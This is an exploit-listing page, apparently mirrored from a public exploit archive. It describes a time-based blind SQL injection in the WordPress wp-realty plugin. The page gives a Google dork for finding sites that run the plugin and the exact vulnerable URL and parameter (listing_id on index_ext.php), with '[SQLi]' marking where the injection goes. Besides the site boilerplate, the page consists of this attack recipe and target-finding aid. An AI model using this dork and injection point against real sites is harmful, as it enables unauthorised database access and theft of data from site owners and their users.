[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin Realty - Blind SQL Injection

Author: Napsterakos
type: webapps
platform: php
port: 80.0
date_added: 2013-10-17 
date_updated: 2013-10-17 
verified: 1 
codes: OSVDB-98748 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: 
 $$$$$$\      $$\   $$\     $$$$$$\
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/

# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos


Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]


Credits to: Greek Hacking Scene
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.